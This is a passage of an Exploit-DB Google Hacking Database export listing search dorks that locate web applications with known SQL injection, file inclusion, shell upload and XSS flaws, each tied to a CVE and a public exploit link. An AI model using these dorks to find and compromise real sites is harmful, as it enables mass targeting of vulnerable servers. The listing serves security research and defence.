<author>anonymous</author>
</entry>
<entry>
<id>1453</id>
<link>https://www.exploit-db.com/ghdb/1453</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;modules/wfdownloads/viewcat.php?cid&quot;</shortDescription>
<textualDescription>XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5218</textualDescription>
<query>allinurl: &quot;modules/wfdownloads/viewcat.php?cid&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22modules/wfdownloads/viewcat.php%3Fcid%22</querystring>
<edb>https://www.exploit-db.com/exploits/5218</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1729</id>
<link>https://www.exploit-db.com/ghdb/1729</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;name Sections op viewarticle artid&quot;</shortDescription>
<textualDescription>PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5154</textualDescription>
<query>allinurl: &quot;name Sections op viewarticle artid&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22name+Sections+op+viewarticle+artid%22</querystring>
<edb>https://www.exploit-db.com/exploits/5154</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2169</id>
<link>https://www.exploit-db.com/ghdb/2169</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;pollBooth.php?op=results&quot;pollID</shortDescription>
<textualDescription>Pollbooth 2.0 (pollID) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5436</textualDescription>
<query>allinurl: &quot;pollBooth.php?op=results&quot;pollID</query>
<querystring>https://www.google.com/search?q=allinurl:+%22pollBooth.php%3Fop%3Dresults%22pollID</querystring>
<edb>https://www.exploit-db.com/exploits/5436</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2045</id>
<link>https://www.exploit-db.com/ghdb/2045</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;showCat.php?cat_id&quot;</shortDescription>
<textualDescription>D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5291</textualDescription>
<query>allinurl: &quot;showCat.php?cat_id&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22showCat.php%3Fcat_id%22</querystring>
<edb>https://www.exploit-db.com/exploits/5291</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1446</id>
<link>https://www.exploit-db.com/ghdb/1446</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;wordspew-rss.php&quot;</shortDescription>
<textualDescription>Wordpress Plugin Wordspew Remote SQL Injection Vulnerability - CVE: 2008-0682: https://www.exploit-db.com/exploits/5039</textualDescription>
<query>allinurl: &quot;wordspew-rss.php&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22wordspew-rss.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5039</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1522</id>
<link>https://www.exploit-db.com/ghdb/1522</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: aid &quot;com_xfaq&quot;</shortDescription>
<textualDescription>Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability - CVE: 2008-0795: https://www.exploit-db.com/exploits/5109</textualDescription>
<query>allinurl: aid &quot;com_xfaq&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+aid+%22com_xfaq%22</querystring>
<edb>https://www.exploit-db.com/exploits/5109</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2801</id>
<link>https://www.exploit-db.com/ghdb/2801</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: Category.php?IndustrYID=</shortDescription>
<textualDescription>CmS (id) SQL Injection Vulnerability - CVE: 2009-2439: https://www.exploit-db.com/exploits/12333</textualDescription>
<query>http://www.google.com/search?source=ig&amp;hl=fr&amp;rlz=&amp;q=allinurl:+Category.php%3FIndustrYID%3D</query>
<querystring>https://www.google.com/search?source=ig&amp;hl=fr&amp;rlz=&amp;q=allinurl:+Category.php%3FIndustrYID%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12333</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1982</id>
<link>https://www.exploit-db.com/ghdb/1982</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: cid&quot;modules/classifieds/index.php?pa=Adsview&quot;</shortDescription>
<textualDescription>XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability - CVE: 2008-0873: https://www.exploit-db.com/exploits/5158</textualDescription>
<query>allinurl: cid&quot;modules/classifieds/index.php?pa=Adsview&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+cid%22modules/classifieds/index.php%3Fpa%3DAdsview%22</querystring>
<edb>https://www.exploit-db.com/exploits/5158</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1447</id>
<link>https://www.exploit-db.com/ghdb/1447</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_clasifier</shortDescription>
<textualDescription>Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability - CVE: 2008-0842: https://www.exploit-db.com/exploits/5146</textualDescription>
<query>allinurl: com_clasifier</query>
<querystring>https://www.google.com/search?q=allinurl:+com_clasifier</querystring>
<edb>https://www.exploit-db.com/exploits/5146</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2036</id>
<link>https://www.exploit-db.com/ghdb/2036</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_gallery &quot;func&quot;</shortDescription>
<textualDescription>Mambo Component com_gallery Remote SQL Injection Vulnerability - CVE: 2008-0746: https://www.exploit-db.com/exploits/5084</textualDescription>
<query>allinurl: com_gallery &quot;func&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+com_gallery+%22func%22</querystring>
<edb>https://www.exploit-db.com/exploits/5084</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1620</id>
<link>https://www.exploit-db.com/ghdb/1620</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_mcquiz &quot;tid&quot;</shortDescription>
<textualDescription>Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability - CVE: 2008-0800: https://www.exploit-db.com/exploits/5118</textualDescription>
<query>allinurl: com_mcquiz &quot;tid&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+com_mcquiz+%22tid%22</querystring>
<edb>https://www.exploit-db.com/exploits/5118</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1586</id>
<link>https://www.exploit-db.com/ghdb/1586</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_paxxgallery &quot;userid&quot;</shortDescription>
<textualDescription>Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability - CVE: 2008-0801: https://www.exploit-db.com/exploits/5117</textualDescription>
<query>allinurl: com_paxxgallery &quot;userid&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+com_paxxgallery+%22userid%22</querystring>
<edb>https://www.exploit-db.com/exploits/5117</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1487</id>
<link>https://www.exploit-db.com/ghdb/1487</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_pcchess &quot;user_id&quot;</shortDescription>
<textualDescription>Joomla Component pcchess 0.8 Remote SQL Injection Vulnerability - CVE: 2008-0761: https://www.exploit-db.com/exploits/5104</textualDescription>
<query>allinurl: com_pcchess &quot;user_id&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+com_pcchess+%22user_id%22</querystring>
<edb>https://www.exploit-db.com/exploits/5104</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1591</id>
<link>https://www.exploit-db.com/ghdb/1591</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_quiz&quot;tid&quot;</shortDescription>
<textualDescription>Joomla Component Quiz 0.81 (tid) SQL Injection Vulnerability - CVE: 2008-0799: https://www.exploit-db.com/exploits/5119</textualDescription>
<query>allinurl: com_quiz&quot;tid&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+com_quiz%22tid%22</querystring>
<edb>https://www.exploit-db.com/exploits/5119</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1496</id>
<link>https://www.exploit-db.com/ghdb/1496</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: com_ricette</shortDescription>
<textualDescription>Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability - CVE: 2008-0841: https://www.exploit-db.com/exploits/5133</textualDescription>
<query>allinurl: com_ricette</query>
<querystring>https://www.google.com/search?q=allinurl:+com_ricette</querystring>
<edb>https://www.exploit-db.com/exploits/5133</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2792</id>
<link>https://www.exploit-db.com/ghdb/2792</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: e107_plugins/easyshop/easyshop.php</shortDescription>
<textualDescription>e107 Plugin EasyShop (category_id) Blind SQL Injection - CVE: 2008-4786: https://www.exploit-db.com/exploits/6852</textualDescription>
<query>allinurl: e107_plugins/easyshop/easyshop.php</query>
<querystring>https://www.google.com/search?q=allinurl:+e107_plugins/easyshop/easyshop.php</querystring>
<edb>https://www.exploit-db.com/exploits/6852</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2067</id>
<link>https://www.exploit-db.com/ghdb/2067</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: galid &quot;index.php?p=gallerypic&quot;</shortDescription>
<textualDescription>Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5413</textualDescription>
<query>allinurl: galid &quot;index.php?p=gallerypic&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+galid+%22index.php%3Fp%3Dgallerypic%22</querystring>
<edb>https://www.exploit-db.com/exploits/5413</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1452</id>
<link>https://www.exploit-db.com/ghdb/1452</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: id &quot;com_jooget&quot;</shortDescription>
<textualDescription>Joomla Component jooget</textualDescription>
<query>allinurl: id &quot;com_jooget&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+id+%22com_jooget%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1450</id>
<link>https://www.exploit-db.com/ghdb/1450</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: modules-php-name-Siir</shortDescription>
<textualDescription>PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5169</textualDescription>
<query>allinurl: modules-php-name-Siir</query>
<querystring>https://www.google.com/search?q=allinurl:+modules-php-name-Siir</querystring>
<edb>https://www.exploit-db.com/exploits/5169</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2681</id>
<link>https://www.exploit-db.com/ghdb/2681</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: modules-php-op-modload &quot;req view_cat&quot;</shortDescription>
<textualDescription>PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability - CVE: 2008-0827: https://www.exploit-db.com/exploits/5147</textualDescription>
<query>allinurl: modules-php-op-modload &quot;req view_cat&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+modules-php-op-modload+%22req+view_cat%22</querystring>
<edb>https://www.exploit-db.com/exploits/5147</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1829</id>
<link>https://www.exploit-db.com/ghdb/1829</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: page_id album &quot;photo&quot;</shortDescription>
<textualDescription>Wordpress Photo album Remote SQL Injection Vulnerability - CVE: 2008-0939: https://www.exploit-db.com/exploits/5135</textualDescription>
<query>allinurl: page_id album &quot;photo&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+page_id+album+%22photo%22</querystring>
<edb>https://www.exploit-db.com/exploits/5135</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2360</id>
<link>https://www.exploit-db.com/ghdb/2360</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;/lildbi/&quot;</shortDescription>
<textualDescription>LILDBI Shell Upload Vulnerability: https://www.exploit-db.com/exploits/14443</textualDescription>
<query>allinurl:&quot;/lildbi/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22/lildbi/%22</querystring>
<edb>https://www.exploit-db.com/exploits/14443</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1773</id>
<link>https://www.exploit-db.com/ghdb/1773</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;/questcms/&quot;</shortDescription>
<textualDescription>QuestCMS (main.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2137</textualDescription>
<query>allinurl:&quot;/questcms/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22/questcms/%22</querystring>
<edb>https://www.exploit-db.com/exploits/2137</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2444</id>
<link>https://www.exploit-db.com/ghdb/2444</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;/questcms/&quot;</shortDescription>
<textualDescription>Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities - CVE: 2008-4773: https://www.exploit-db.com/exploits/6853</textualDescription>
<query>allinurl:&quot;/questcms/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22/questcms/%22</querystring>
<edb>https://www.exploit-db.com/exploits/6853</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1574</id>
<link>https://www.exploit-db.com/ghdb/1574</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;/ubbthreads/&quot;</shortDescription>
<textualDescription>UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability - CVE: 2006-2568: https://www.exploit-db.com/exploits/1814</textualDescription>
<query>allinurl:&quot;/ubbthreads/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22/ubbthreads/%22</querystring>
<edb>https://www.exploit-db.com/exploits/1814</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4511</id>
<link>https://www.exploit-db.com/ghdb/4511</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;/wp-content/plugins/wp-noexternallinks&quot;</shortDescription>
<textualDescription>Dork to find the &quot;No External Links&quot; plugin vulnerable to XSS
&quot;&quot;Error: Plugin does not support standalone calls, damned hacker.&quot;&quot;
allinurl:&quot;/wp-content/plugins/wp-noexternallinks&quot;
Drok3r</textualDescription>
<query>allinurl:&quot;/wp-content/plugins/wp-noexternallinks&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;/wp-content/plugins/wp-noexternallinks&quot;</querystring>
<edb></edb>
<date>2017-06-05</date>
<author>Drok3r</author>
</entry>
<entry>
<id>3302</id>
<link>https://www.exploit-db.com/ghdb/3302</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;article.download.php&quot;</shortDescription>
<textualDescription>Star Articles 6.0 Remote File Upload Vulnerability - CVE: 2008-7076: https://www.exploit-db.com/exploits/7251</textualDescription>
<query>allinurl:&quot;article.download.php&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22article.download.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/7251</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2452</id>
<link>https://www.exploit-db.com/ghdb/2452</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;channel_detail.php?chid=&quot;</shortDescription>
<textualDescription>YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability - CVE: 2007-3518: https://www.exploit-db.com/exploits/4136</textualDescription>
<query>allinurl:&quot;channel_detail.php?chid=&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22channel_detail.php%3Fchid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4136</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2867</id>
<link>https://www.exploit-db.com/ghdb/2867</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_accombo&quot;</shortDescription>
<textualDescription>Mambo Component accombo 1.x (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5279</textualDescription>
<query>allinurl:&quot;com_accombo&quot;</query>
<querystring>https://www.google.com/search?q=allinurl%3A%22com_accombo%22</querystring>
<edb>https://www.exploit-db.com/exploits/5279</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2926</id>
<link>https://www.exploit-db.com/ghdb/2926</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_ahsshop&quot;do=default</shortDescription>
<textualDescription>Mambo Component ahsShop 1.51 (vara) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5335</textualDescription>
<query>allinurl:&quot;com_ahsshop&quot;do=default</query>
<querystring>https://www.google.com/search?q=allinurl%3A%22com_ahsshop%22do%3Ddefault</querystring>
<edb>https://www.exploit-db.com/exploits/5335</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2610</id>
<link>https://www.exploit-db.com/ghdb/2610</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_candle&quot;</shortDescription>
<textualDescription>Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5221</textualDescription>
<query>allinurl:&quot;com_candle&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_candle%22</querystring>
<edb>https://www.exploit-db.com/exploits/5221</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3101</id>
<link>https://www.exploit-db.com/ghdb/3101</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_cinema&quot;</shortDescription>
<textualDescription>Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5300</textualDescription>
<query>allinurl:&quot;com_cinema&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_cinema%22</querystring>
<edb>https://www.exploit-db.com/exploits/5300</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1597</id>
<link>https://www.exploit-db.com/ghdb/1597</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_extcalendar&quot;</shortDescription>
<textualDescription>Joomla Component com_extcalendar Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14694</textualDescription>
<query>allinurl:&quot;com_extcalendar&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_extcalendar%22</querystring>
<edb>https://www.exploit-db.com/exploits/14694</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1500</id>
<link>https://www.exploit-db.com/ghdb/1500</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_garyscookbook&quot;</shortDescription>
<textualDescription>Mambo Component garyscookbook 1.1.1 SQL Injection Vulnerability - CVE: 2008-1137: https://www.exploit-db.com/exploits/5178</textualDescription>
<query>allinurl:&quot;com_garyscookbook&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_garyscookbook%22</querystring>
<edb>https://www.exploit-db.com/exploits/5178</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2419</id>
<link>https://www.exploit-db.com/ghdb/2419</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_n-gallery&quot;</shortDescription>
<textualDescription>Mambo Component n-gallery Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/5980</textualDescription>
<query>allinurl:&quot;com_n-gallery&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_n-gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/5980</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2688</id>
<link>https://www.exploit-db.com/ghdb/2688</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_na_content&quot;</shortDescription>
<textualDescription>Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability - CVE: 2008-0721: https://www.exploit-db.com/exploits/5076</textualDescription>
<query>allinurl:&quot;com_na_content&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_na_content%22</querystring>
<edb>https://www.exploit-db.com/exploits/5076</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2711</id>
<link>https://www.exploit-db.com/ghdb/2711</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_neogallery&quot;</shortDescription>
<textualDescription>Joomla Component NeoGallery 1.1 SQL Injection Vulnerability - CVE: 2008-0752: https://www.exploit-db.com/exploits/5083</textualDescription>
<query>allinurl:&quot;com_neogallery&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_neogallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/5083</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2896</id>
<link>https://www.exploit-db.com/ghdb/2896</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_restaurante&quot;</shortDescription>
<textualDescription>Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability - CVE: 2008-1465: https://www.exploit-db.com/exploits/5280</textualDescription>
<query>allinurl:&quot;com_restaurante&quot;</query>
<querystring>https://www.google.com/search?q=allinurl%3A%22com_restaurante%22</querystring>
<edb>https://www.exploit-db.com/exploits/5280</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1515</id>
<link>https://www.exploit-db.com/ghdb/1515</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;com_simpleshop&quot;</shortDescription>
<textualDescription>Joomla Component simple shop 2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5177</textualDescription>
<query>allinurl:&quot;com_simpleshop&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22com_simpleshop%22</querystring>
<edb>https://www.exploit-db.com/exploits/5177</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1559</id>
<link>https://www.exploit-db.com/ghdb/1559</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;detResolucion.php?tipodoc_id=&quot;</shortDescription>
<textualDescription>CMS Ariadna 2009 SQL Injection - OSVDB-ID: 63929: https://www.exploit-db.com/exploits/12301</textualDescription>
<query>allinurl:&quot;detResolucion.php?tipodoc_id=&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22detResolucion.php%3Ftipodoc_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12301</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2985</id>
<link>https://www.exploit-db.com/ghdb/2985</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;index.php?mod=archives&quot;</shortDescription>
<textualDescription>KwsPHP Module Archives (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5351</textualDescription>
<query>allinurl:&quot;index.php?mod=archives&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22index.php%3Fmod%3Darchives%22</querystring>
<edb>https://www.exploit-db.com/exploits/5351</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2040</id>
<link>https://www.exploit-db.com/ghdb/2040</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;index.php?site=&quot; &quot;W-Agora&quot;</shortDescription>
<textualDescription>w-Agora 4.2.1 (cat) Remote SQL Injection Vulnerability - CVE: 2007-6647: https://www.exploit-db.com/exploits/4817</textualDescription>
<query>allinurl:&quot;index.php?site=&quot; &quot;W-Agora&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22index.php%3Fsite%3D%22+%22W-Agora%22</querystring>
<edb>https://www.exploit-db.com/exploits/4817</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1670</id>
<link>https://www.exploit-db.com/ghdb/1670</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;jokes.php?catagorie=&quot;</shortDescription>
<textualDescription>Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability - CVE: 2008-2065: https://www.exploit-db.com/exploits/5508</textualDescription>
<query>allinurl:&quot;jokes.php?catagorie=&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22jokes.php%3Fcatagorie%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/5508</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2723</id>
<link>https://www.exploit-db.com/ghdb/2723</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;lyrics_menu/lyrics_song.php?l_id=&quot;</shortDescription>
<textualDescription>e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability - CVE: 2008-4906: https://www.exploit-db.com/exploits/6885</textualDescription>
<query>allinurl:&quot;lyrics_menu/lyrics_song.php?l_id=&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22lyrics_menu/lyrics_song.php%3Fl_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6885</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2254</id>
<link>https://www.exploit-db.com/ghdb/2254</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;macgurublog.php?uid=&quot;</shortDescription>
<textualDescription>e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability - CVE: 2008-6438: https://www.exploit-db.com/exploits/6856</textualDescription>
<query>allinurl:&quot;macgurublog.php?uid=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl:%22macgurublog.php%3Fuid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6856</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1539</id>
<link>https://www.exploit-db.com/ghdb/1539</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;members.asp?action&quot;</shortDescription>
<textualDescription>MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5187</textualDescription>
<query>allinurl:&quot;members.asp?action&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22members.asp%3Faction%22</querystring>
<edb>https://www.exploit-db.com/exploits/5187</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1512</id>
<link>https://www.exploit-db.com/ghdb/1512</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;modules/photo/viewcat.php?id&quot;</shortDescription>
<textualDescription>RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability - CVE: 2008-1551: https://www.exploit-db.com/exploits/5290</textualDescription>
<query>allinurl:&quot;modules/photo/viewcat.php?id&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22modules/photo/viewcat.php%3Fid%22</querystring>
<edb>https://www.exploit-db.com/exploits/5290</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3366</id>
<link>https://www.exploit-db.com/ghdb/3366</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;shop.htm?shopMGID=&quot;</shortDescription>
<textualDescription>CMS Ignition SQL Injection: https://www.exploit-db.com/exploits/14471</textualDescription>
<query>allinurl:&quot;shop.htm?shopMGID=&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22shop.htm%3FshopMGID%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/14471</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2861</id>
<link>https://www.exploit-db.com/ghdb/2861</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;verliadmin&quot;</shortDescription>
<textualDescription>VerliAdmin 0.3 (index.php) Remote File Include - CVE: 2006-6666: https://www.exploit-db.com/exploits/2944</textualDescription>
<query>allinurl:&quot;verliadmin&quot;</query>
<querystring>https://www.google.com/search?q=allinurl%3A%22verliadmin%22</querystring>
<edb>https://www.exploit-db.com/exploits/2944</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1826</id>
<link>https://www.exploit-db.com/ghdb/1826</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:&quot;xGb.php&quot;</shortDescription>
<textualDescription>xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability - CVE: 2007-4637: https://www.exploit-db.com/exploits/4336</textualDescription>
<query>allinurl:&quot;xGb.php&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22xGb.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/4336</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2412</id>
<link>https://www.exploit-db.com/ghdb/2412</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:/m2f_usercp.php?</shortDescription>
